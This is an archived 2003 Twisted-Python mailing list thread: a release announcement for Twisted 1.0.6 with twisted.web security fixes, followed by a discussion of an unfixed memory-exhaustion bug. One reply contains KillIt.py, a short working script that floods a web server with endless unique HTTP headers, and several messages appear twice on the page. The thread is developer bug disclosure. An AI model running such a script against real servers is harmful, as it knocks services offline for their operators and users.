[Twisted-Python] ANN: Twisted 1.0.6 (includes security fixes)
![](https://secure.gravatar.com/avatar/d7875f8cfd8ba9262bfff2bf6f6f9b35.jpg?s=120&d=mm&r=g)
IMPORTANT: This release includes security updates to twisted.web. It is strongly recommended that you upgrade to this version of Twisted. Twisted is an event-driven networking framework for server and client applications. For more information, visit http://www.twistedmatrix.com, join the list http://twistedmatrix.com/cgi-bin/mailman/listinfo/twisted-python or visit us on #twisted at irc.freenode.net. What's New in 1.0.6 =================== - Security fixes for twisted.web. - Cred, Twisted's unified authentication and authorization framework, was rewritten. While still not stable, the new system is far superior and developers are encouraged to start using it. - Flow, an utility page for integrating asynchronous control flow with generators and iterators. - Many improvements to the UDP subsystem. - Many Windows-specific networking bug fixes. - Cleanups in Woven - outputted HTML no longer includes attributes used by templating, removed fake-acquisition for templates. - Support switching over to TLS from TCP connections (useful for e.g. STARTTLS in SMTP.) - Improvements to the mail protocols and infrastructure. - Fixed 2.2.0 compatibility. - Index support for Lore. - Bug fixes, documentation updates and small feature improvements.
![](https://secure.gravatar.com/avatar/2d3e32506243224474e7292fab5fddba.jpg?s=120&d=mm&r=g)
Itamar Shtull-Trauring:
Was the out-of-memory denial of service attack fixed? http://www.twistedmatrix.com/pipermail/twisted-python/2003-June/ 004462.html Looking at the code, it looks like I can still keep adding headers until the machine exhausts memory def headerReceived(self, line): """Do pre-processing (for content-length) and store this header away. """ header, data = line.split(':', 1) header = header.lower() data = data.strip() if header == 'content-length': self.length = int(data) self.requests[-1].received_headers[header] = data Andrew dalke@dalkescientific.com
![](https://secure.gravatar.com/avatar/2d3e32506243224474e7292fab5fddba.jpg?s=120&d=mm&r=g)
Me:
Err, that code doesn't actually work (it reuses the same header names, so there isn't a memory problem). Here's some real attack code ===== KillIt.py import socket class KillIt: def __init__(self, where): self.f = socket.socket(socket.AF_INET, socket.SOCK_STREAM) self.f.connect(where) self.f.send("GET / HTTP/1.1\r\n") self.n = 0 def kill(self): factor = 1000000 for i in range(self.n*factor, (self.n+1)*factor): self.f.send("%s: X\r\n" % i) if i%1000 == 0: print i self.n += 1 =======
Andrew
![](https://secure.gravatar.com/avatar/d7875f8cfd8ba9262bfff2bf6f6f9b35.jpg?s=120&d=mm&r=g)
On Tue, 1 Jul 2003 19:52:07 +0200 Andrew Dalke <dalke@dalkescientific.com> wrote:
Was the out-of-memory denial of service attack fixed?
No, we fixed a more serious security bug :/ Going through http code and fixing all the DoS issues is on my todo list. -- Itamar Shtull-Trauring http://itamarst.org/ http://www.zoteca.com -- Python & Twisted consulting
![](https://secure.gravatar.com/avatar/2d3e32506243224474e7292fab5fddba.jpg?s=120&d=mm&r=g)
Itamar Shtull-Trauring:
Was the out-of-memory denial of service attack fixed? http://www.twistedmatrix.com/pipermail/twisted-python/2003-June/ 004462.html Looking at the code, it looks like I can still keep adding headers until the machine exhausts memory def headerReceived(self, line): """Do pre-processing (for content-length) and store this header away. """ header, data = line.split(':', 1) header = header.lower() data = data.strip() if header == 'content-length': self.length = int(data) self.requests[-1].received_headers[header] = data Andrew dalke@dalkescientific.com
![](https://secure.gravatar.com/avatar/2d3e32506243224474e7292fab5fddba.jpg?s=120&d=mm&r=g)
Me:
Err, that code doesn't actually work (it reuses the same header names, so there isn't a memory problem). Here's some real attack code ===== KillIt.py import socket class KillIt: def __init__(self, where): self.f = socket.socket(socket.AF_INET, socket.SOCK_STREAM) self.f.connect(where) self.f.send("GET / HTTP/1.1\r\n") self.n = 0 def kill(self): factor = 1000000 for i in range(self.n*factor, (self.n+1)*factor): self.f.send("%s: X\r\n" % i) if i%1000 == 0: print i self.n += 1 =======
Andrew
![](https://secure.gravatar.com/avatar/d7875f8cfd8ba9262bfff2bf6f6f9b35.jpg?s=120&d=mm&r=g)
On Tue, 1 Jul 2003 19:52:07 +0200 Andrew Dalke <dalke@dalkescientific.com> wrote:
Was the out-of-memory denial of service attack fixed?
No, we fixed a more serious security bug :/ Going through http code and fixing all the DoS issues is on my todo list. -- Itamar Shtull-Trauring http://itamarst.org/ http://www.zoteca.com -- Python & Twisted consulting
participants (2)
-
Andrew Dalke
-
Itamar Shtull-Trauring